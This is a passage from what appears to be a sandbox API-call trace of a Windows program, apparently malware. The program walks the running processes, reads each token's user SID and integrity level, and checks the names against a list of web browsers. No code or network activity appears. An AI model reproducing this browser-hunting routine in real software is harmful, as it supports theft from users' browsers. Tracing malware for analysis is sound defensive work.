TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.176] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.176] GetLastError () returned 0x7a [0239.176] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.176] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.176] CloseHandle (hObject=0x340) returned 1 [0239.177] CloseHandle (hObject=0x548) returned 1 [0239.177] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.177] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.177] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.177] GetLastError () returned 0x7a [0239.177] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.177] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.177] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.177] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0239.177] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0239.177] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0239.177] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0239.177] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0239.177] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0239.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0239.177] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.177] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.178] GetLastError () returned 0x7a [0239.178] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.178] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.178] CloseHandle (hObject=0x340) returned 1 [0239.178] CloseHandle (hObject=0x548) returned 1 [0239.178] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.178] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.178] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.178] GetLastError () returned 0x7a [0239.178] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.178] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.178] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.178] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.178] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0239.178] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.178] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.178] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.179] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0239.179] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.179] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.179] GetLastError () returned 0x7a [0239.179] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.179] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.179] CloseHandle (hObject=0x340) returned 1 [0239.179] CloseHandle (hObject=0x548) returned 1 [0239.179] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.179] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.179] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.179] GetLastError () returned 0x7a [0239.179] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.179] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.179] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.179] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0239.180] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0239.180] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0239.180] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0239.180] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0239.180] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0239.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0239.180] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.180] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.180] GetLastError () returned 0x7a [0239.180] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.180] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.180] CloseHandle (hObject=0x340) returned 1 [0239.180] CloseHandle (hObject=0x548) returned 1 [0239.180] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.180] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.180] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.180] GetLastError () returned 0x7a [0239.180] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.181] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.181] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.181] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0239.181] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0239.181] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.181] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.181] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.181] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0239.181] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.181] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.181] GetLastError () returned 0x7a [0239.181] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.181] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.181] CloseHandle (hObject=0x340) returned 1 [0239.181] CloseHandle (hObject=0x548) returned 1 [0239.181] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.181] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.182] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.182] GetLastError () returned 0x7a [0239.182] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.182] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.182] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.182] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0239.182] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0239.182] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0239.182] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0239.182] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0239.182] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0239.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0239.182] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.182] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.182] GetLastError () returned 0x7a [0239.182] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.183] CloseHandle (hObject=0x340) returned 1 [0239.183] CloseHandle (hObject=0x548) returned 1 [0239.183] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.183] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.183] GetLastError () returned 0x7a [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.183] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.183] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.183] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0239.183] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0239.183] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0239.183] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0239.183] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0239.183] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0239.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x548 [0239.183] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.183] GetLastError () returned 0x7a [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.183] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.184] CloseHandle (hObject=0x340) returned 1 [0239.184] CloseHandle (hObject=0x548) returned 1 [0239.184] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.184] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.184] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.184] GetLastError () returned 0x7a [0239.184] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.184] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.184] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.184] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0239.184] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0239.184] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0239.184] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0239.184] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0239.184] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0239.184] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.185] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0241.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbf10) returned 0xc0000004 [0241.183] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0241.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0241.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0241.184] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.184] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.185] GetLastError () returned 0x7a [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.185] CloseHandle (hObject=0x340) returned 1 [0241.185] CloseHandle (hObject=0x548) returned 1 [0241.185] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.185] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.185] GetLastError () returned 0x7a [0241.185] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.185] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.185] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.185] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0241.185] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0241.185] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0241.185] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0241.185] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0241.185] lstrcmpiW 